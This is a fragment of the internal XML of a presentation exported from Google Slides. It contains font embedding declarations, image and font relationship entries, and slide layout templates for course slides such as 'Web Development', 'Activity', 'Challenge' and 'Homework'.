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Roboto Thin"/>
      <p:regular r:id="rId33"/>
      <p:bold r:id="rId34"/>
      <p:italic r:id="rId35"/>
      <p:boldItalic r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId37"/>
      <p:boldItalic r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId39"/>
      <p:bold r:id="rId40"/>
      <p:italic r:id="rId41"/>
      <p:boldItalic r:id="rId42"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId43"/>
      <p:bold r:id="rId44"/>
      <p:italic r:id="rId45"/>
      <p:boldItalic r:id="rId46"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>
      <p:regular r:id="rId47"/>
      <p:bold r:id="rId48"/>
      <p:italic r:id="rId49"/>
      <p:boldItalic r:id="rId5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>
          <p15:clr>
            <a:srgbClr val="9AA0A6"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="2232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2755310F-95EA-4E01-95FB-42BB52A92B5E}">
  <a:tblStyle styleId="{2755310F-95EA-4E01-95FB-42BB52A92B5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orient="horz"/>
        <p:guide pos="2232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RobotoMedium-bold.fntdata"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-italic.fntdata"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-bold.fntdata"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-regular.fntdata"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-boldItalic.fntdata"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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font" Target="fonts/RobotoLight-bold.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-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font" Target="fonts/RobotoThin-regular.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-bold.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack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font" Target="fonts/RobotoLight-boldItalic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4" name="Shape 10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" name="Google Shape;1015;g8798eb4c4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6" name="Google Shape;1016;g8798eb4c4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4" name="Shape 1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5" name="Google Shape;1115;g8623a2bef4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6" name="Google Shape;1116;g8623a2bef4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g8623a2bef4_1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5" name="Google Shape;1135;g8623a2bef4_1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114de73d9e9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3" name="Google Shape;1153;g114de73d9e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2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g1139fe34a7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4" name="Google Shape;1174;g1139fe34a7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114fc4de69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114fc4de69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8798eb4c4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4" name="Google Shape;1204;g8798eb4c4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g8623a2bef4_1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1" name="Google Shape;1211;g8623a2bef4_1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g8623a2bef4_1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1" name="Google Shape;1221;g8623a2bef4_1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g8623a2bef4_1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2" name="Google Shape;1232;g8623a2bef4_1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9" name="Shape 1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0" name="Google Shape;1240;g8623a2bef4_1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1" name="Google Shape;1241;g8623a2bef4_1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8623a2bef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8623a2bef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7" name="Shape 1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8" name="Google Shape;1248;g8798eb4c44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9" name="Google Shape;1249;g8798eb4c44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g8798eb4c44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6" name="Google Shape;1256;g8798eb4c44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8798eb4c44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8798eb4c44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0" name="Shape 1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1" name="Google Shape;1271;g8798eb4c44_0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2" name="Google Shape;1272;g8798eb4c44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8" name="Shape 1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9" name="Google Shape;1279;g8798eb4c44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0" name="Google Shape;1280;g8798eb4c44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6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g8798eb4c44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8" name="Google Shape;1288;g8798eb4c44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8798eb4c44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8798eb4c44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80f7e6291e_1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Google Shape;1049;g80f7e6291e_1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8798eb4c44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8798eb4c44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g8798eb4c44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3" name="Google Shape;1063;g8798eb4c44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8798eb4c44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Google Shape;1071;g8798eb4c44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8798eb4c44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8798eb4c44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5" name="Shape 1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6" name="Google Shape;1086;g114de73d9e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7" name="Google Shape;1087;g114de73d9e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g8623a2bef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Google Shape;1095;g8623a2bef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5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4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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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6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0.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16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27.png"/><Relationship Id="rId5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4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4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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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38.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32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43.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40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39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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59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54.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31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7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69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68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82.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79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78.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96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85.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95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7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101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5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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120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4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. Title Slide: Web Development">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_2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oogle Shape;8;p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" name="Google Shape;9;p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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;11;p2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Web Development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2" name="Google Shape;12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" name="Google Shape;13;p2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16" name="Google Shape;16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110" y="1231212"/>
            <a:ext cx="2286002" cy="17030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. Instructor Demonstration">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_2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1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1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1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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242550" y="3895344"/>
            <a:ext cx="8907900" cy="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914400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Instructor Demonstration</a:t>
            </a:r>
            <a:endParaRPr sz="27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88" name="Google Shape;88;p11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9963" y="-228600"/>
            <a:ext cx="8535272" cy="4064423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 txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-101100" y="4387000"/>
            <a:ext cx="9251400" cy="4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9144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. Activity">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1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12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2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" name="Google Shape;9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2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" name="Google Shape;96;p12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 rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="39" l="0" r="0" t="29"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899000" y="1133363"/>
            <a:ext cx="1737360" cy="1911096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" name="Google Shape;99;p12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0" name="Google Shape;100;p12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2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. Activity with Instructions ">
  <p:cSld name="CUSTOM_2_5_1_3_1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3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="39" l="0" r="0" t="29"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8275625" y="4154800"/>
            <a:ext cx="594361" cy="653795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6" name="Google Shape;106;p1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8" name="Google Shape;108;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p1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0" name="Google Shape;110;p13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. Challenge">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_4"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4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5" name="Google Shape;11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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2"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9" name="Google Shape;119;p14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Suggested Time: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21" name="Google Shape;121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3900" y="-595025"/>
            <a:ext cx="295035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. Challenge with Instructions">
  <p:cSld name="CUSTOM_2_5_1_4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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph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25" name="Google Shape;125;p1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6" name="Google Shape;126;p15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27" name="Google Shape;127;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2"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8" name="Google Shape;128;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3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0" name="Google Shape;130;p15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31" name="Google Shape;13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13200" y="3862850"/>
            <a:ext cx="656773" cy="11449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. Homework">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_3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6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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7350" y="0"/>
            <a:ext cx="9157800" cy="274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16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="209" r="209" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="858369" y="1097625"/>
            <a:ext cx="1737361" cy="1980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6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7" name="Google Shape;13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2160" y="3975150"/>
            <a:ext cx="548640" cy="725893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9" name="Google Shape;139;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-101100" y="4234600"/>
            <a:ext cx="89703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0" name="Google Shape;140;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="3943225"/>
            <a:ext cx="76584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Due Date:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="13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1" name="Google Shape;141;p1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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="1042875"/>
            <a:ext cx="8595300" cy="27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56030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800">
          <p15:clr>
            <a:srgbClr val="F9AD4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. Homework with Instructions">
  <p:cSld name="CUSTOM_2_5_2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/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="319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45" name="Google Shape;145;p1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46" name="Google Shape;146;p1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7" name="Google Shape;147;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="504" r="504" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257069" y="4200875"/>
            <a:ext cx="548641" cy="624077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9" name="Google Shape;149;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2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0" name="Google Shape;150;p1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17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4641650"/>
            <a:ext cx="9168600" cy="26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097275" spcFirstLastPara="1" rIns="1005825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1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005">
          <p15:clr>
            <a:srgbClr val="F9AD4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. Numbered 1–4 (Green)">
  <p:cSld name="CUSTOM_2_7_1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1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57" name="Google Shape;157;p1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8" name="Google Shape;158;p1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59" name="Google Shape;159;p1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1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61" name="Google Shape;161;p18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62" name="Google Shape;162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3" name="Google Shape;163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4" name="Google Shape;164;p18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65" name="Google Shape;165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6" name="Google Shape;166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p18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68" name="Google Shape;168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69" name="Google Shape;169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p18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71" name="Google Shape;171;p18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72" name="Google Shape;172;p18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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="13980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4" name="Google Shape;174;p1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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2233538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8" name="Google Shape;178;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3076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9" name="Google Shape;179;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="39189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. Numbered 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4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19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3" name="Google Shape;183;p1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184" name="Google Shape;184;p1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5" name="Google Shape;185;p1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86" name="Google Shape;186;p1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7" name="Google Shape;187;p1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88" name="Google Shape;188;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1300225"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="189" name="Google Shape;189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0" name="Google Shape;190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1" name="Google Shape;191;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2000125"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="192" name="Google Shape;192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3" name="Google Shape;193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4" name="Google Shape;194;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2692850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="195" name="Google Shape;195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6" name="Google Shape;196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7" name="Google Shape;197;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3390350"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="198" name="Google Shape;19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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7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1" name="Google Shape;201;p19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19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4" name="Google Shape;204;p19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5" name="Google Shape;205;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="26952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6" name="Google Shape;206;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="3385563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07" name="Google Shape;207;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="469500" y="4083075"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208" name="Google Shape;208;p19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09" name="Google Shape;209;p19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134F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19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9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. Numbered 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1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0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5" name="Google Shape;215;p2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16" name="Google Shape;216;p2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7" name="Google Shape;217;p2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18" name="Google Shape;218;p2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9" name="Google Shape;219;p2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21" name="Google Shape;221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2" name="Google Shape;222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0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24" name="Google Shape;224;p20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5" name="Google Shape;225;p20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26" name="Google Shape;226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27" name="Google Shape;227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8" name="Google Shape;228;p20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0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30" name="Google Shape;230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1" name="Google Shape;231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0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p20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34" name="Google Shape;234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5" name="Google Shape;235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p20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p20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38" name="Google Shape;238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39" name="Google Shape;239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0" name="Google Shape;240;p20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1" name="Google Shape;241;p20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42" name="Google Shape;242;p20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43" name="Google Shape;243;p20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4" name="Google Shape;244;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075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5" name="Google Shape;245;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075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6" name="Google Shape;246;p20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7" name="Google Shape;247;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="3622088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8" name="Google Shape;248;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="4236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. Title Slide: UX/UI Design">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1_1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Google Shape;18;p3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" name="Google Shape;19;p3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3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UX/UI Design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21" name="Google Shape;21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" name="Google Shape;22;p3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4735" y="1058550"/>
            <a:ext cx="2560322" cy="1920238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. Numbered 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_2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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="123782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2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2" name="Google Shape;252;p2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53" name="Google Shape;253;p2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4" name="Google Shape;254;p2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55" name="Google Shape;255;p2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6" name="Google Shape;256;p2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57" name="Google Shape;257;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="258" name="Google Shape;258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59" name="Google Shape;259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0" name="Google Shape;260;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12225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61" name="Google Shape;261;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="182890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2" name="Google Shape;262;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1828900"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="263" name="Google Shape;263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4" name="Google Shape;264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5" name="Google Shape;265;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="2419975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6" name="Google Shape;266;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2419975"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="267" name="Google Shape;267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68" name="Google Shape;268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9" name="Google Shape;269;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="3011050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0" name="Google Shape;270;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3011050"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="271" name="Google Shape;271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2" name="Google Shape;272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0D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3" name="Google Shape;273;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="3602138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4" name="Google Shape;274;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3602137"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="275" name="Google Shape;275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05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76" name="Google Shape;276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365C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21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="4193263"/>
            <a:ext cx="75171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8" name="Google Shape;278;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="279" name="Google Shape;279;p21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06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280" name="Google Shape;280;p21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1" name="Google Shape;281;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1858813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2" name="Google Shape;282;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12250" y="24399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3" name="Google Shape;283;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-121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4" name="Google Shape;284;p21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5" name="Google Shape;285;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150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. Numbered 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1"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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
